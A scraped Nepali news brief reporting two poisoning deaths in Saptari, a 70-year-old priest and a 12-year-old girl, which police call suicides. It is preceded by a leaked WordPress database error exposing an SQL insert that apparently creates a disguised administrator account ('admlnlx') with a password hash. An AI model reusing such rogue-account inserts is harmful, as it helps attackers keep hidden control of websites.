WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BHw1p3Rgv3c4X9HLGMFJhlJvxuyFOV/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 00:42:29', '', 'admlnlx', 'admlnlx')
सप्तरी,माघ २ –
कोलाडी बसाइनस्थित रामजानकी मन्दिरमा पूजा गर्ने एक पुजारीकोे आज विष खाएर मृत्यु भएको छ ।
सत्तरीवर्षीय मन्दिरका पुजारी फुलोदेवी सरदारले विष खाएर आत्महत्या गरेको प्रहरीले जनाएको छ ।
यसैगरी सप्तरीकै नर्घौ गाविस– ६ की १२ वर्षीया ज्योतिकुमारी माली पनि विष खाएर मरेको प्रहरीले जनाएको छ । ती शव परीक्षणका लागि राजविराजस्थित गजेन्द्रनारायण सिंह सगरमाथा अञ्चल अस्पतालमा राखिएको जिल्ला प्रहरी कार्यालय सप्तरीले जनाएको छ । – रासस